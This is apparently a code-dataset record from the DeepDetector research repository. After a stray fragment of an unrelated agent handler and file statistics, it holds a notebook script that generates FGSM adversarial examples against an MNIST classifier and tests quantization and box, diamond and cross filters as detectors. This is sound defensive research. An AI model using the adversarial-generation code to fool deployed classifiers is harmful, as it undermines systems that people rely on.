pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await pres_ex_record.save(context)
await responder.send_reply(problem_report)
raise HandlerException(
"Data agreement terminate signature verification failed"
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement = data_agreement_instance.serialize()
pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_TERMINATE
await pres_ex_record.save(context)
# Construct terminate ack message
data_agreement_terminate_ack = DataAgreementTerminationAck(
status="TERMINATE OK"
)
data_agreement_terminate_ack.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
await responder.send_reply(data_agreement_terminate_ack)
| 46.98153 | 213 | 0.668707 | 1,741 | 17,806 | 6.492246 | 0.106261 | 0.212775 | 0.104043 | 0.131381 | 0.818986 | 0.788021 | 0.771742 | 0.756879 | 0.744404 | 0.726975 | 0 | 0.004396 | 0.284567 | 17,806 | 378 | 214 | 47.10582 | 0.882879 | 0.092609 | 0 | 0.590734 | 0 | 0.023166 | 0.135445 | 0.0222 | 0 | 0 | 0 | 0 | 0.003861 | 1 | 0 | false | 0 | 0.065637 | 0 | 0.111969 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e1f6ff0d37fd00012690d6e8573b4fc32a3219b3 | 35,479 | py | Python | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null | DeepDetector-master/Train/Train_FGSM_MNIST.py | JohnZhang000/adaptive-jpeg-compression | f54e4798c01169812958f4d5539a03927dbdc313 | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import keras
from keras import backend
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.utils_mnist import data_mnist
from cleverhans.utils_tf import model_train, model_eval, model_argmax
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport
from cleverhans.utils_keras import cnn_model
from cleverhans.utils_keras import KerasModelWrapper
import time
import matplotlib.pyplot as plt
import math
FLAGS = flags.FLAGS
# In[2]:
def normalization(image_data):
image_data[image_data<0] = 0
image_data[image_data>1.0] = 1.0
def boxMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[row][col] = sum(sum(inputDigit[row-start:row+start+1,col-start:col+start+1]))/coefficient
return retDigit
def diamondAndCrossFilterOperations(inputDigit, kernel, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
retDigit[row][col] = sum(sum(inputDigit[row-start:row+start+1, col-start:col+start+1]*kernel))/coefficient
return retDigit
def scalarQuantization(inputDigit, interval, left=True):
retDigit = inputDigit*255
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
retDigit/=255.0
return retDigit
# In[3]:
#Train with scalar quantization left: 2,3,4,5,6,7,8,9,10
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
keras.layers.core.K.set_learning_phase(0)
report = AccuracyReport()
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
intervals = [128,85,64,51,43,37,32,28,26]
for intervalIndex in range(9):
startTime = time.time()
print('NBinterval = ', intervalIndex+2, '; interval size = ', intervals[intervalIndex])
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
for i in range(1000):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = scalarQuantization(currentX, intervals[intervalIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = scalarQuantization(currentAdvX, intervals[intervalIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
# In[3]:
#Train with box filters: 3,5,7,9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True for load, False for not load
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
#box filter test, kernel size: 3, 5, 7, 9
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('box filter, size = ', kernelSize)
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
coefficient = kernelSize**2
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = boxMeanFilterOperations(currentX, start, end, coefficient)
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = boxMeanFilterOperations(currentAdvX, start, end, coefficient)
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
# In[3]:
#Train with diamond filters: 3,5,7,9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True for load, False for not load
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
diamonds = [np.array([[0,1,0],[1,1,1],[0,1,0]]),
np.array([[0,0,1,0,0],
[0,1,1,1,0],
[1,1,1,1,1],
[0,1,1,1,0],
[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],
[0,0,1,1,1,0,0],
[0,1,1,1,1,1,0],
[1,1,1,1,1,1,1],
[0,1,1,1,1,1,0],
[0,0,1,1,1,0,0],
[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],
[0,0,0,1,1,1,0,0,0],
[0,0,1,1,1,1,1,0,0],
[0,1,1,1,1,1,1,1,0],
[1,1,1,1,1,1,1,1,1],
[0,1,1,1,1,1,1,1,0],
[0,0,1,1,1,1,1,0,0],
[0,0,0,1,1,1,0,0,0],
[0,0,0,0,1,0,0,0,0],])]
coefficient = [5,13, 25, 41]
#diamond filter test, kernel size: 3, 5, 7, 9
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
kernelIndex+=1
print('diamond filter')
print(diamonds[kernelIndex])
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = diamondAndCrossFilterOperations(currentX, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = diamondAndCrossFilterOperations(currentAdvX, diamonds[kernelIndex], start, end, coefficient[kernelIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
# In[3]:
#Train with cross filters: 3,5,7,9
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
"""
MNIST CleverHans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param train_dir: Directory storing the saved model
:param filename: Filename to save model under
:param load_model: True for load, False for not load
:param testing: if true, test error is calculated
:return: an AccuracyReport object
"""
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.1)
# config = tf.ConfigProto(gpu_options=gpu_options)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.2,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[:4500]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
print('adversarial examples generation time = ', advGenTime, 'seconds')
crosses = [np.array([[0,1,0],[1,1,1],[0,1,0]]),
np.array([[0,0,1,0,0],
[0,0,1,0,0],
[1,1,1,1,1],
[0,0,1,0,0],
[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[1,1,1,1,1,1,1],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0],
[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[1,1,1,1,1,1,1,1,1],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],
[0,0,0,0,1,0,0,0,0],])]
coefficient = [5,9, 13, 17]
#diamond filter test, kernel size: 3, 5, 7, 9
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
start = (kernelSize-1)//2
end = 28-start
kernelIndex+=1
print('cross filter')
print(crosses[kernelIndex])
for i in range(4500):
current_class = int(np.argmax(Y_test[i]))
currentXLabel = model_argmax(sess,x,predictions,X_test[i:(i+1)])
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
currentAdvXLabel = model_argmax(sess,x,predictions,adv_x[i:(i+1)])
if currentAdvXLabel == currentXLabel:
disturbed_failure_number+=1
continue
test_number+=1
currentX = np.reshape(X_test[i:(i+1)], (28,28))
currentX = diamondAndCrossFilterOperations(currentX, crosses[kernelIndex], start, end, coefficient[kernelIndex])
currentX = np.reshape(currentX, X_test[i:(i+1)].shape)
currentXFilteredLabel = model_argmax(sess,x,predictions,currentX)
currentAdvX = np.reshape(adv_x[i:(i+1)], (28,28))
currentAdvX = diamondAndCrossFilterOperations(currentAdvX, crosses[kernelIndex], start, end, coefficient[kernelIndex])
currentAdvX = np.reshape(currentAdvX, X_test[i:(i+1)].shape)
currentAdvXFilteredLabel = model_argmax(sess,x,predictions,currentAdvX)
if currentAdvXFilteredLabel != currentAdvXLabel:
TP+=1
if currentAdvXFilteredLabel == current_class:
TTP+=1
else:
FN+=1
if currentXFilteredLabel != currentXLabel:
FP+=1
if (i+1) % 1000 == 0:
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (test_number,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall = TP/(TP+FN)
Precision = TP/(TP+FP)
tempStarStr = '********************************************************'
recallStr = 'Recall = %.4f' % (Recall)
precisionStr = 'Precision = %.4f' % (Precision)
print(tempStarStr)
print(recallStr)
print(precisionStr)
print(tempStarStr)
return report
def main(argv=None):
mnist_tutorial(nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
train_dir=FLAGS.train_dir,
filename=FLAGS.filename,
load_model=FLAGS.load_model)
if __name__ == '__main__':
flags.DEFINE_integer('nb_epochs', 6, 'Number of epochs to train model')
flags.DEFINE_integer('batch_size', 128, 'Size of training batches')
flags.DEFINE_float('learning_rate', 0.001, 'Learning rate for training')
flags.DEFINE_string('train_dir', '/tmp', 'Directory where to save model.')
flags.DEFINE_string('filename', 'mnist.ckpt', 'Checkpoint filename.')
flags.DEFINE_boolean('load_model', True, 'Load saved model or train.')
tf.app.run()
